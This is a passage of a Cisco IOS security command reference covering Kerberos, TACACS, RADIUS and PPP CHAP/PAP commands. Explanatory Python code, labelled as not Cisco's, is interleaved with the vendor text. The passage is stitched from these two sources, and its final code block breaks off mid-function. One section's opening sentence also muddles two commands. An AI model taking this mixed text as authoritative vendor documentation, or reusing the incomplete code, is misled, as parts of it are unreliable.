      [12.3.4] arap authentication
      To enable AAA authentication for ARA on a line, use the arap authentication line configuration command. Use the no form of the command to disable authentication for an ARA line.
      arap authentication {default | list-name}
      no arap authentication {default | list-name}

      Caution If you use a list-name value that was not configured with the aaa authentication arap command, ARA protocol will be disabled on this line.
      Syntax Description
      default Default list created with the aaa authentication arap command.
      list-name Indicated list created with the aaa authentication arap command.
      Default
      ARA protocol authentication uses the default set with the aaa authentication arap command. If no default is set, the local user database is checked.
      Command Mode
      Line configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 11.0.
      This command is a per-line command that specifies the name of a list of AAA authentication methods to try at login. If no list is specified, the default list is used (whether or not it is specified in the command line). You create defaults and lists with the aaa authentication arap command. Entering the no version of arap authentication has the same effect as entering the command with the default argument.
      Before issuing this command, create a list of authentication processes by using the aaa authentication arap global configuration command.
      Example
      The following example specifies that the TACACS+ authentication list called MIS-access is used on ARA line 7:
      line 7
      arap authentication MIS-access
      Related Command
      aaa authentication arap
      [12.3.5] clear kerberos creds
      Use the clear kerberos creds EXEC command to delete the contents of your credentials cache.
      clear kerberos creds
      Syntax Description
      This command has no keywords or arguments.
      Command Mode
      EXEC
      Usage Guidelines
      This command first appeared in Cisco IOS Release 11.1.
      Credentials are cleared when the user logs out.
      Cisco supports Kerberos 5.
      Example
      The following example illustrates the clear kerberos creds command:
      cisco-2500> show kerberos creds
      Default Principal: chet@cisco.com
      Valid Starting Expires Service Principal
      18-Dec-1995 16:21:07 19-Dec-1995 00:22:24 krbtgt/CISCO.COM@CISCO.COM
      cisco-2500> clear kerberos creds
      cisco-2500> show kerberos creds
      No Kerberos credentials.
      cisco-2500>
      Related Command
      show kerberos creds
      [12.3.6] enable last-resort
      To specify what happens if the TACACS and extended TACACS servers used by the enable command do not respond, use the enable last-resort global configuration command. Use the no form of this command to restore the default.
      enable last-resort {password | succeed}
      no enable last-resort {password | succeed}
      Syntax Description
      password Allows you to enter enable mode by entering the privileged command level password. A password must contain from 1 to 25 uppercase and lowercase alphanumeric characters.
      succeed Allows you to enter enable mode without further question.
      Default
      Access to enable mode is denied.
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.0.
      The secondary authentication is used only if the first attempt fails.
      Note This command is not used in AAA/TACACS+, which uses the aaa authentication suite of commands instead.
      Example
      In the following example, if the TACACS servers do not respond to the enable command, the user can enable by entering the privileged level password:
      enable last-resort password
      Related Command
      A dagger (†) indicates that the command is documented outside this chapter.
      enable †
       
      [12.3.7] enable use-tacacs
      To enable use of the TACACS to determine whether a user can access the privileged command level, use the enable use-tacacs global configuration command. Use the no form of this command to disable TACACS verification.
      enable use-tacacs
      no enable use-tacacs
      Caution If you use the enable use-tacacs command, you must also use the tacacs-server authenticate enable command, or you will be locked out of the privileged command level.
      Syntax Description
      This command has no arguments or keywords.
      Default
      Disabled
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.0.
      When you add this command to the configuration file, the EXEC enable command prompts for a new username and password pair. This pair is then passed to the TACACS server for authentication. If you are using extended TACACS, it also passes any existing UNIX user identification code to the server.
      Note This command initializes TACACS. Use the tacacs server-extended command to initialize extended TACACS, or use the aaa new-model command to initialize AAA/TACACS+.
      Example
      The following example sets TACACS verification on the privileged EXEC-level login sequence:
      enable use-tacacs
      tacacs-server authenticate enable
      Related Command
      A dagger (†) indicates that the command is documented outside this chapter.
      tacacs-server authenticate enable †
       
      [12.3.8] ip radius source-interface
      Use the ip radius source-interface global configuration command to force RADIUS to use the IP address of a specified interface for all outgoing RADIUS packets. Use the no form of this command to disable use of a specified interface IP address.
      ip radius source-interface subinterface-name
      no ip radius source-interface
      Syntax Description
      subinterface-name Name of the interface that RADIUS uses for all of its outgoing packets.
      Default
      This command has no factory-assigned default.
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 11.1.
      Use this command to set a subinterface's IP address to be used as the source address for all outgoing RADIUS packets. This address is used as long as the interface is in the up state. In this way, the RADIUS server can use one IP address entry for every network access client instead of maintaining a list of IP addresses.
      This command is especially useful in cases where the router has many interfaces, and you want to ensure that all RADIUS packets from a particular router have the same IP address.
      The specified interface must have an IP address associated with it. If the specified subinterface does not have an IP address or is in a down state, then RADIUS reverts to the default. To avoid this, add an IP address to the subinterface or bring the interface to the up state.
      Example
      The following example makes RADIUS use the IP address of subinterface s2 for all outgoing RADIUS packets:
      ip radius source-interface s2
      Related Commands
      A dagger (†) indicates that the command is documented outside this chapter.
      ip tacacs source-interface †
      ip telnet source-interface †
      ip tftp source-interface †
      [12.3.9] ip tacacs source-interface
      Use the ip tacacs source-interface global configuration command to force TACACS to use the IP address of a specified interface for all outgoing TACACS packets. Use the no form of this command to disable use of a specified interface IP address.
      ip tacacs source-interface subinterface-name
      no ip tacacs source-interface
      Syntax Description
      subinterface-name Name of the interface that TACACS uses for all of its outgoing packets.
      Default
      This command has no factory-assigned default.
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 11.1.
      Use this command to set a subinterface's IP address for all outgoing TACACS packets. This address is used as long as the interface is in the up state. In this way, the TACACS server can use one IP address entry associated with the network access client instead of maintaining a list of all IP addresses.
      This command is especially useful in cases where the router has many interfaces, and you want to ensure that all TACACS packets from a particular router have the same IP address.
      The specified interface must have an IP address associated with it. If the specified subinterface does not have an IP address or is in a down state, TACACS reverts to the default. To avoid this, add an IP address to the subinterface or bring the interface to the up state.
      Example
      The following example makes TACACS use the IP address of subinterface s2 for all outgoing TACACS (TACACS, extended TACACS, or TACACS+) packets:
      ip tacacs source-interface s2
      Related Commands
      A dagger (†) indicates that the command is documented outside this chapter.
      ip radius source-interface †
      ip telnet source-interface †
      ip tftp source-interface †
      [12.4.0] kerberos clients mandatory
      Use the kerberos clients mandatory global configuration command to cause the rsh, rcp, rlogin, and telnet commands to fail if they cannot negotiate the Kerberos protocol with the remote server. Use the no form of this command to disable this option.
      kerberos clients mandatory
      no kerberos clients mandatory
      Syntax Description
      This command has no arguments or keywords.
      Default
      Disabled
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 11.2.
      If this command is not configured and the user has Kerberos credentials stored locally, the rsh, rcp, rlogin, and telnet commands attempt to negotiate the Kerberos protocol with the remote server and will use the un-Kerberized protocols if unsuccessful.
      If this command is not configured and the user has no Kerberos credentials, the standard protocols for rcp and rsh are used to negotiate the Kerberos protocol.
      Example
      The following example illustrates the kerberos clients mandatory command:
      kerberos clients mandatory
      Related Commands
      A dagger (†) indicates that this command is documented outside this chapter.
      copy rcp †
      kerberos credentials forward
      rlogin †
      rsh †
      telnet †
      [12.4.1] kerberos credentials forward
      Use the kerberos credentials forward global configuration command to force all network application clients on the router to forward users' Kerberos credentials upon successful Kerberos authentication. Use the no form of this command to turn off Kerberos credentials forwarding.
      kerberos credentials forward
      no kerberos credentials forward
      Syntax Description
      This command has no arguments or keywords.
      Default
      Disabled
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 11.2.
      Enable credentials forwarding to have users' TGTs forwarded to the host they authenticate to. In this way, users can connect to multiple hosts in the Kerberos realm without running the KINIT program each time they need to get a TGT.
      Example
      The following example illustrates the kerberos credentials forward command:
      kerberos credentials forward
      Related Commands
      A dagger (†) indicates that the command is documented outside this chapter.
      copy rcp †
      rlogin †
      rsh †
      telnet †
      [12.4.2] kerberos instance map
      Use the kerberos instance map global configuration command to map Kerberos instances to Cisco IOS privilege levels. Use the no form of this command to remove a Kerberos instance map.
      kerberos instance map instance privilege-level
      no kerberos instance map instance
      Syntax Description
      instance Name of a Kerberos instance.
      privilege-level The privilege level at which a user is set if the user's Kerberos principal contains the matching Kerberos instance. You can specify up to 16 privilege levels, using numbers 0 through 15. Level 1 is normal EXEC-mode user privileges.
      Default
      Privilege level 1
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 11.2.
      Use this command to create user instances with access to administrative commands.
      Example
      In the following example, the privilege level is set to 15 for authenticated Kerberos users with the admin instance in Kerberos realm cisco.com:
      kerberos instance map admin 15
      Related Command
      aaa authorization
      [12.4.3] kerberos local-realm
      Use the kerberos local-realm global configuration command to specify the Kerberos realm in which the router is located. Use the no form of this command to remove the specified Kerberos realm from this router.
      kerberos local-realm kerberos-realm
      no kerberos local-realm
      Syntax Description
      kerberos-realm The name of the default Kerberos realm. A Kerberos realm consists of users, hosts, and network services that are registered to a Kerberos server. The Kerberos realm must be in uppercase letters.
      Default
      Disabled
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 11.1.
      The router can be located in more than one realm at a time. However, there can only be one instance of Kerberos local-realm. The realm specified with this command is the default realm.
      Example
      The following example illustrates the kerberos local-realm command:
      kerberos local-realm MURUGA.COM
      Related Commands
      kerberos preauth
      kerberos realm
      kerberos server
      kerberos srvtab entry
      kerberos srvtab remote
      [12.4.4] kerberos preauth
      Use the kerberos preauth global configuration command to specify a preauthentication method to use to communicate with the KDC. Use the no form of this command to disable Kerberos preauthentication.
      kerberos preauth [encrypted-unix-timestamp | none]
      no kerberos preauth
      Syntax Description
      encrypted-unix-timestamp Use an encrypted UNIX timestamp as a quick authentication method when communicating with the KDC.
      none Do not use Kerberos preauthentication.
      Default
      Disabled
      Command Mode
      Global Configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 11.2.
      It is more secure to use a preauthentication for communications with the KDC. However, communication with the KDC will fail if the KDC does not support this particular version of kerberos preauth. If that happens, turn off the preauthentication with the none option.
      The no form of this command is equivalent to using the none keyword.
      Example
      The following example illustrates how to enable and disable Kerberos preauthentication:
      kerberos preauth encrypted-unix-timestamp
      kerberos preauth none
      Related Commands
      kerberos local-realm
      kerberos server
      kerberos srvtab entry
      kerberos srvtab remote
      [12.4.5] kerberos realm
      Use the kerberos realm global configuration command to map a host name or Domain Naming System (DNS) domain to a Kerberos realm. Use the no form of this command to remove a Kerberos realm map.
      kerberos realm {dns-domain | host} kerberos-realm
      no kerberos realm {dns-domain | host} kerberos-realm
      Syntax Description
      dns-domain Name of a DNS domain or host.
      host Name of a DNS host.
      kerberos-realm Name of the Kerberos realm the specified domain or host belongs to.
      Default
      Disabled
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 11.1.
      DNS domains are specified with a leading dot (.) character; hostnames cannot begin with a dot (.) character. There can be multiple entries of this line.
      A Kerberos realm consists of users, hosts, and network services that are registered to a Kerberos server. Kerberos realm names must be in all uppercase characters. The router can be located in more than one realm at a time.
      Example
      The following example illustrates the kerberos realm command:
      kerberos realm .muruga.com MURUGA.COM
      kerberos realm muruga.com MURUGA.COM
      Related Commands
      kerberos local-realm
      kerberos server
      kerberos srvtab entry
      kerberos srvtab remote
      [12.4.6] kerberos server
      Use the kerberos server global configuration command to specify the location of the Kerberos server for a given Kerberos realm. Use the no form of this command to remove a Kerberos server for a specified Kerberos realm.
      kerberos server kerberos-realm {hostname | ip-address} [port-number]
      no kerberos server kerberos-realm {hostname | ip-address}
      Syntax Description
      kerberos-realm Name of the Kerberos realm. A Kerberos realm consists of users, hosts, and network services that are registered to a Kerberos server. The Kerberos realm must be in uppercase letters.
      hostname Name of the host functioning as a Kerberos server for the specified Kerberos realm (translated into an IP address at the time of entry).
      ip-address IP address of the host functioning as a Kerberos server for the specified Kerberos realm.
      port-number (Optional) Port that the KDC/TGS monitors (defaults to 88).
      Default
      Disabled
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 11.1.
      Example
      The following example specifies 126.38.47.66 as the Kerberos server for the Kerberos realm MURUGA.COM:
      kerberos server MURUGA.COM 126.38.47.66
      Related Commands
      kerberos local-realm
      kerberos realm
      kerberos srvtab entry
      kerberos srvtab remote
      [12.4.7] kerberos srvtab entry
      Use the kerberos srvtab remote global configuration command (not kerberos srvtab entry) to retrieve a SRVTAB file from a remote host and automatically generate a Kerberos SRVTAB entry configuration. (The Kerberos SRVTAB entry is the router's locally stored SRVTAB.) Use the no form of this command to remove a SRVTAB entry from the router's configuration.
      kerberos srvtab entry kerberos-principal principal-type timestamp key-version number
      key-type key-length encrypted-keytab
      no kerberos srvtab entry kerberos-principal principal-type
      Syntax Description
      kerberos-principal A service on the router.
      principal-type Version of the Kerberos SRVTAB.
      timestamp Number representing the date and time the SRVTAB entry was created.
      key-version number Version of the encryption key format.
      key-type Type of encryption used.
      key-length Length, in bytes, of the encryption key.
      encrypted-keytab Secret key the router shares with the KDC. It is encrypted with the private Data Encryption Standard (DES) key (if available) when you write out your configuration.
      Command Mode
      Global configuration.
      Usage Guidelines
      This command first appeared in Cisco IOS Release 11.2.
      When you use the kerberos srvtab remote command to copy the SRVTAB file from a remote host (generally the KDC), it parses the information in this file and stores it in the router's running configuration in the kerberos srvtab entry format. The key for each SRVTAB entry is encrypted with a private DES key if one is defined on the router. To ensure that the SRVTAB is available (that is, that it does not need to be acquired from the KDC) when you reboot the router, use the write memory router configuration command to write the router's running configuration to NVRAM.
      If you reload a configuration, with a SRVTAB encrypted with a private DES key, on to a router that does not have a private DES key defined, the router displays a message informing you that the SRVTAB entry has been corrupted, and discards the entry.
      If you change the private DES key and reload an old version of the router's configuration that contains SRVTAB entries encrypted with the old private DES keys, the router will restore your Kerberos SRVTAB entries, but the SRVTAB keys will be corrupted. In this case, you must delete your old Kerberos SRVTAB entries and reload your Kerberos SRVTABs on to the router using the kerberos srvtab remote command.
      Although you can configure kerberos srvtab entry on the router manually, generally you would not do this because the keytab is encrypted automatically by the router when you copy the SRVTAB using the kerberos srvtab remote command.
      Example
      In the following example, host/new-router.loki.com@LOKI.COM is the host, 0 is the type, 817680774 is the timestamp, 1 is the version of the key, 1 indicates that DES is the encryption type, 8 is the number of bytes, and .cCN.YoU.okK is the encrypted key:
      kerberos srvtab entry host/new-router.loki.com@LOKI.COM 0 817680774 1 1 8 .cCN.YoU.okK
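      Three of the commands in this chapter (kerberos instance map, kerberos realm, and kerberos srvtab entry) all turn on how a Kerberos principal and its realm are read. The following Python helper, added here as an illustration and not Cisco code, splits a principal into primary, instance, and realm; applies an instance map with the page's default of privilege level 1; resolves a hostname to a realm using the leading-dot rule (domain entries match as a suffix, hostname entries match exactly); and parses a kerberos srvtab entry line into its fields, decoding the timestamp. The class name, method names, and the sample host and principal names are constructed for the example; the srvtab line is the one from the page.

```python
from datetime import datetime, timezone


def parse_principal(principal):
    """Split 'primary/instance@REALM' into (primary, instance, realm); instance may be empty."""
    name, sep, realm = principal.rpartition("@")
    if not sep or not realm:
        raise ValueError(f"principal lacks a realm: {principal!r}")
    primary, _, instance = name.partition("/")
    return primary, instance, realm


class KerberosRouterConfig:
    """Hypothetical in-memory model of the router's Kerberos maps (not IOS code)."""

    def __init__(self):
        self.instance_map = {}  # kerberos instance map <instance> <privilege-level>
        self.realm_map = {}     # kerberos realm {.dns-domain | host} <KERBEROS-REALM>

    def add_instance_map(self, instance, privilege_level):
        if not 0 <= privilege_level <= 15:
            raise ValueError("privilege level must be 0 through 15")
        self.instance_map[instance] = privilege_level

    def add_realm_map(self, name, realm):
        if realm != realm.upper():
            raise ValueError("Kerberos realm names must be in uppercase")
        self.realm_map[name.lower()] = realm

    def privilege_for(self, principal):
        """Privilege level for an authenticated principal; level 1 when no instance matches."""
        _, instance, _ = parse_principal(principal)
        return self.instance_map.get(instance, 1)

    def realm_for_host(self, host):
        """Hostname entries match exactly; entries with a leading dot match as a domain suffix."""
        host = host.lower()
        if host in self.realm_map:
            return self.realm_map[host]
        best = None
        for name, realm in self.realm_map.items():
            if name.startswith(".") and host.endswith(name):
                if best is None or len(name) > len(best[0]):
                    best = (name, realm)  # prefer the most specific (longest) domain
        return best[1] if best else None


def parse_srvtab_entry(line):
    """Parse one 'kerberos srvtab entry ...' configuration line into a dict."""
    words = line.split()
    if words[:3] != ["kerberos", "srvtab", "entry"] or len(words) != 10:
        raise ValueError("expected: kerberos srvtab entry <principal> <type> <timestamp> "
                         "<key-version> <key-type> <key-length> <encrypted-keytab>")
    principal, ptype, ts, kvno, ktype, klen, keytab = words[3:]
    primary, instance, realm = parse_principal(principal)
    return {
        "principal": principal,
        "service": primary,                 # e.g. 'host'
        "host": instance,                   # the router's own name for a host/ principal
        "realm": realm,
        "principal_type": int(ptype),
        "created": datetime.fromtimestamp(int(ts), tz=timezone.utc),
        "key_version": int(kvno),
        "key_type": int(ktype),             # 1 = DES in the page's example
        "key_length": int(klen),            # bytes
        "encrypted_keytab": keytab,
    }


if __name__ == "__main__":
    cfg = KerberosRouterConfig()
    cfg.add_instance_map("admin", 15)                  # kerberos instance map admin 15
    cfg.add_realm_map(".muruga.com", "MURUGA.COM")     # kerberos realm .muruga.com MURUGA.COM
    cfg.add_realm_map("muruga.com", "MURUGA.COM")      # kerberos realm muruga.com MURUGA.COM
    print(cfg.privilege_for("chet/admin@CISCO.COM"), cfg.privilege_for("chet@CISCO.COM"))
    print(cfg.realm_for_host("gw1.muruga.com"), cfg.realm_for_host("muruga.com"))
    entry = parse_srvtab_entry(
        "kerberos srvtab entry host/new-router.loki.com@LOKI.COM 0 817680774 1 1 8 .cCN.YoU.okK")
    print(entry["created"].isoformat(), entry["key_type"], entry["key_length"])
```

      The realm resolver shows why the page's kerberos realm example needs two lines: the suffix entry .muruga.com does not match the bare host muruga.com, so a separate exact-host entry is required.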
      Related Commands
      kerberos srvtab remote
      key config-key
      [12.4.8] kerberos srvtab remote
      Use the kerberos srvtab remote configuration command to retrieve a krb5 SRVTAB file from the specified host.
      kerberos srvtab remote {hostname | ip-address} filename
      Syntax Description
      hostname Machine with the Kerberos SRVTAB file.
      ip-address IP address of the machine with the Kerberos SRVTAB file.
      filename Name of the SRVTAB file.
      Command Mode
      Configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 11.2.
      When you use the kerberos srvtab remote command to copy the SRVTAB file from the remote host (generally the KDC), it parses the information in this file and stores it in the router's running configuration in the kerberos srvtab entry format. The key for each SRVTAB entry is encrypted with a private DES key if one is defined on the router.
      Example
      The following example retrieves the SRVTAB file scooter.vtab from the host bucket.cisco.com:
      kerberos srvtab remote bucket.cisco.com scooter.vtab
      Related Commands
      kerberos srvtab entry
      key config-key
      [12.4.9] key config-key
      Use the key config-key global configuration command to define a private DES key for the router. Use the no form of this command to delete the private Data Encryption Standard (DES) key for the router.
      key config-key string
      no key config-key
      Syntax Description
      string Private DES key for the router.
      Default
      No DES key is defined.
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 11.2.
      This command defines for the router a private DES key that will not appear in the router configuration. This private DES key can be used to DES-encrypt certain parts of the router's configuration.
      Related Commands
      kerberos srvtab entry
      kerberos srvtab remote
      [12.5.0] login tacacs
      To configure your router to use TACACS user authentication, use the login tacacs line configuration command. Use the no form of this command to disable TACACS user authentication for a line.
      login tacacs
      no login tacacs
      Syntax Description
      This command has no arguments or keywords.
      Command Mode
      Line configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.0.
      Use the login tacacs command only if you have already configured a TACACS server and you have a command control language (CCL) script that allows you to use TACACS security. For information about using files provided by Cisco Systems to modify CCL scripts to support TACACS user authentication, see the "Configuring AppleTalk Remote Access" chapter.
      Note This command cannot be used with AAA/TACACS+. Use the aaa authentication login command instead.
      Example
      In the following example, TACACS user authentication is enabled on the lines selected with the line command:
      login tacacs
      [12.5.1] nasi authentication
      To specify the authentication list to use for NASI clients connecting through the selected line or lines, use the nasi authentication line configuration command. Use the no form of the command to return to the default, as specified by the aaa authentication nasi command.
      nasi authentication {default | list-name}
      no nasi authentication {default | list-name}
      Syntax Description
      default Uses the default list created with the aaa authentication nasi command.
      list-name Uses the list created with the aaa authentication nasi command.
      Default
      Uses the default set with the aaa authentication nasi command.
      Command Mode
      Line configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 11.1.
      This command is a per-line command used with AAA authentication that specifies the name of a list of TACACS+ authentication methods to try at login. If no list is specified, the default list is used, even if it is specified in the command line. (You create defaults and lists with the aaa authentication nasi command.) Entering the no form of this command has the same effect as entering the command with the default argument.
      Caution If you use a list-name value that was not configured with the aaa authentication nasi command, you will disable login on this line.
      Before issuing this command, create a list of authentication processes by using the aaa authentication nasi global configuration command.
      Examples
      The following example specifies that the default AAA authentication be used on line 4:
      line 4
      nasi authentication default
      The following example specifies that the AAA authentication list called list1 be used on line 7:
      line 7
      nasi authentication list1
      Related Commands
      A dagger (†) indicates that the command is documented outside this chapter.
      aaa authentication nasi
      ipx nasi-server enable †
      show ipx nasi connections †
      show ipx spx-protocol †
      [12.5.2] ppp authentication
      To enable Challenge Handshake Authentication Protocol (CHAP) or Password Authentication Protocol (PAP) or both and to specify the order in which CHAP and PAP authentication are selected on the interface, use the ppp authentication interface configuration command. Use the no form of the command to disable this authentication.
      ppp authentication {chap | chap pap | pap chap | pap } [if-needed] [list-name | default]
      [callin]
      no ppp authentication
      Syntax Description
      chap Enables CHAP on a serial interface.
      pap Enables PAP on a serial interface.
      chap pap Enables both CHAP and PAP, and performs CHAP authentication before PAP.
      pap chap Enables both CHAP and PAP, and performs PAP authentication before CHAP.
      if-needed (Optional) Used with TACACS and extended TACACS. Does not perform CHAP or PAP authentication if the user has already provided authentication. This option is available only on asynchronous interfaces.
      list-name (Optional) Used with AAA/TACACS+. Specifies the name of a list of TACACS+ methods of authentication to use. If no list name is specified, the system uses the default. The list is created with the aaa authentication ppp command.
      default The name of the method list is created with the aaa authentication ppp command.
      callin Specifies authentication on incoming (received) calls only.
      Caution If you use a list-name value that was not configured with the aaa authentication ppp command, you will disable PPP on this interface.
      Default
      PPP authentication is not enabled.
      Command Mode
      Interface configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.0.
      When you enable CHAP or PAP authentication, or both, the local router requires the remote device to prove its identity before allowing data traffic to flow. PAP authentication requires the remote device to send a name and password, which is checked against a matching entry in the local username database or in the remote TACACS/TACACS+ database. CHAP authentication sends a challenge to the remote device. The remote device encrypts the challenge value with a shared secret and returns the encrypted value and its name to the local router in a Response message. The local router attempts to match the remote device's name with an associated secret stored in the local username or remote TACACS/TACACS+ database; it uses the stored secret to encrypt the original challenge and verify that the encrypted values match.
      You can enable PAP or CHAP, or both, in either order. If you enable both methods, the first method specified is requested during link negotiation. If the peer suggests using the second method, or refuses the first method, the second method is tried. Some remote devices support only CHAP, and some support only PAP. Base the order in which you specify methods on the remote device's ability to correctly negotiate the appropriate method, and on the level of data line security you require. PAP usernames and passwords are sent as cleartext strings, which can be intercepted and reused. CHAP has eliminated most of the known security holes.
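      The two paragraphs above describe the difference that matters for line security: PAP puts the password on the wire, CHAP puts only a digest of a fresh challenge and the shared secret. The following Python model, added here as an illustration and not Cisco or PPP stack code, carries both exchanges through: the authenticator (local router) issues a challenge, the peer answers with the RFC 1994 CHAP response MD5(Identifier || Secret || Challenge), the authenticator recomputes it from its stored secret, and a captured response is shown to be useless against a new challenge; beside it, a PAP Authenticate-Request is built byte for byte (RFC 1334) so the cleartext password is visible. The class names, the username database, and the sample names and secrets are constructed for the example.

```python
import hashlib
import hmac
import os


def chap_response(identifier, secret, challenge):
    """RFC 1994 CHAP response: MD5 over Identifier || Secret || Challenge.
    The secret never crosses the link; only this digest does."""
    return hashlib.md5(bytes([identifier]) + secret + challenge).digest()


class ChapAuthenticator:
    """The local router: issues a challenge, then checks the peer's response
    against the secret stored for that name.  `username_db` is a constructed
    dict standing in for the local username database or the TACACS+ server."""

    def __init__(self, username_db):
        self.username_db = username_db
        self.outstanding = {}  # identifier -> challenge bytes awaiting a response

    def challenge(self, identifier, challenge=None):
        challenge = challenge if challenge is not None else os.urandom(16)
        self.outstanding[identifier] = challenge
        return identifier, challenge

    def verify(self, identifier, name, response):
        challenge = self.outstanding.pop(identifier, None)  # each challenge is used once
        secret = self.username_db.get(name)
        if challenge is None or secret is None:
            return False
        expected = chap_response(identifier, secret, challenge)
        return hmac.compare_digest(expected, response)  # constant-time comparison


class ChapPeer:
    """The remote device: proves knowledge of the secret without sending it."""

    def __init__(self, name, secret):
        self.name, self.secret = name, secret

    def respond(self, identifier, challenge):
        return self.name, chap_response(identifier, self.secret, challenge)


def run_chap(username_db, peer, identifier=1):
    """Full exchange Challenge -> Response -> verify; True means Success."""
    auth = ChapAuthenticator(username_db)
    ident, chal = auth.challenge(identifier)
    name, resp = peer.respond(ident, chal)
    return auth.verify(ident, name, resp)


def replay_is_rejected(username_db, peer):
    """A response captured for one challenge does not answer a different one."""
    auth = ChapAuthenticator(username_db)
    ident, chal = auth.challenge(1, b"\x01" * 16)        # fixed challenges keep this deterministic
    name, captured = peer.respond(ident, chal)
    first_ok = auth.verify(ident, name, captured)
    ident2, chal2 = auth.challenge(2, b"\x02" * 16)      # new challenge value
    return first_ok and not auth.verify(ident2, name, captured)


def pap_authenticate_request(identifier, name, password):
    """RFC 1334 PAP Authenticate-Request as it appears on the wire:
    Code=1, Identifier, Length(2), Peer-ID-Length, Peer-ID, Passwd-Length, Password.
    Everything, the password included, is cleartext."""
    body = bytes([len(name)]) + name + bytes([len(password)]) + password
    length = 4 + len(body)
    return bytes([1, identifier]) + length.to_bytes(2, "big") + body


if __name__ == "__main__":
    db = {b"branch1": b"s3cret"}  # constructed username entry
    print("CHAP success:", run_chap(db, ChapPeer(b"branch1", b"s3cret")))
    print("CHAP replay rejected:", replay_is_rejected(db, ChapPeer(b"branch1", b"s3cret")))
    pkt = pap_authenticate_request(1, b"branch1", b"s3cret")
    print("PAP packet carries the password in clear:", b"s3cret" in pkt)
```

      Only the digest and the challenge are observable in the CHAP exchange, and the authenticator discards each challenge after one use, which is why the captured response fails on the second round; the PAP packet, by contrast, can be read and reused as the page states.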
      Enabling or disabling PPP authentication does not affect the local router's willingness to authenticate itself to the remote device.
      If you are using autoselect on a TTY line, you probably want to use the ppp authentication command to turn on PPP authentication for the corresponding interface.
      Example
      The following example enables CHAP on asynchronous interface 4 and uses the authentication list MIS-access:
      interface async 4
      encapsulation ppp
      ppp authentication chap MIS-access
      Related Commands
      A dagger (†) indicates that the command is documented outside this chapter.
      aaa authentication ppp
      aaa new-model
      autoselect †
      encapsulation ppp †
      ppp use-tacacs
      username †
      [12.5.3] ppp chap hostname
      Use the ppp chap hostname interface configuration command to create a pool of dialup routers that all appear to be the same host when authenticating with CHAP. To disable this function, use the no form of the command.
      ppp chap hostname hostname
      no ppp chap hostname hostname
      Syntax Description
      hostname The name sent in the CHAP challenge.
      Default
      Disabled. The router name is sent in any CHAP challenges.
      Command Mode
      Interface configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 11.2.
      Currently, a router dialing a pool of access routers requires a username entry for each possible router in the pool because each router challenges with its hostname. If a router is added to the dialup rotary pool, all connecting routers must be updated. The ppp chap hostname command allows you to specify a common alias for all routers in a rotary group to use so that only one username must be configured on the dialing routers.
      This command is normally used with local CHAP authentication (when the router challenges and authenticates the peer, since it sets the name carried in the challenge), but it can also be used for remote CHAP authentication (when the router authenticates itself to the peer).
      Example
      The commands in the following example identify dialer interface 0 as the dialer rotary group leader and specify PPP as the method of encapsulation used by all member interfaces. CHAP authentication is used on received calls only. The username ISPCorp is sent in all CHAP challenges and responses.
      interface dialer 0
      encapsulation ppp
      ppp authentication chap callin
      ppp chap hostname ISPCorp
      Related Commands
      aaa authentication ppp
      ppp authentication
      ppp chap password
      ppp pap
      [12.5.4] ppp chap password
      Use the ppp chap password interface configuration command to configure a common CHAP secret that the router uses in its response to a challenge from any peer it has no username entry for. This is intended for a router that calls a collection of routers which do not support this command (such as routers running older Cisco IOS software images). To disable this function, use the no form of this command.
      ppp chap password secret
      no ppp chap password secret
      Syntax Description
      secret The secret used to compute the response value for any CHAP challenge from an unknown peer.
      Default
      Disabled.
      Command Mode
      Interface configuration.
      Usage Guidelines
      This command first appeared in Cisco IOS Release 11.2.
      This command allows you to replace several username and password configuration commands with a single copy of this command on any dialer interface or asynchronous group interface.
      This command is used for remote CHAP authentication only (when routers authenticate to the peer) and does not affect local CHAP authentication.
      Example
      The commands in the following example specify Integrated Services Digital Network (ISDN) Basic Rate Interface (BRI) number 0. The method of encapsulation on the interface is PPP. If a CHAP challenge is received from a peer whose name is not found in the global list of usernames, the encrypted secret 7 1267234591 is decrypted and used to create a CHAP response value. (Type 7 encoding only obscures the secret in the configuration file; anyone who can read the configuration can recover it, so protect the configuration accordingly.)
      interface bri 0
      encapsulation ppp
      ppp chap password 7 1267234591
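      The following Python model is an added example, not part of the Cisco documentation or Cisco IOS. It walks through one CHAP exchange (RFC 1994, MD5 algorithm) between a calling router and a member of a dialup pool, beside a PAP check, to show two things from the sections above: why a sniffed PAP credential replays while a sniffed CHAP response does not, and how the pool alias set by ppp chap hostname together with the fallback secret of ppp chap password lets the caller keep a single secret for the whole pool. The hostnames, username entries and secrets are constructed for the example.

```python
"""Added example: CHAP exchange with pool alias and fallback secret, next to PAP replay."""
import hashlib
import hmac
import os
import secrets

# Pool router side: each member is configured `ppp chap hostname ISPCorp`, so
# every challenge carries the alias, and a `username branch-rtr password ...`
# entry holds the secret shared with the caller. (Constructed values.)
POOL_ALIAS = "ISPCorp"
POOL_USERNAME_DB = {"branch-rtr": b"S3cret-shared"}

# Calling router side: no `username ISPCorp ...` entry exists, so the secret
# from `ppp chap password` (shown already decrypted) answers the unknown challenger.
CALLER_HOSTNAME = "branch-rtr"
CALLER_USERNAME_DB = {"some-other-peer": b"another-secret"}
CALLER_DEFAULT_SECRET = b"S3cret-shared"


def chap_response(ident, secret, challenge):
    """CHAP/MD5 Response value: MD5(Identifier || secret || Challenge)."""
    return hashlib.md5(bytes([ident]) + secret + challenge).digest()


def chap_challenge(ident=None, value=None):
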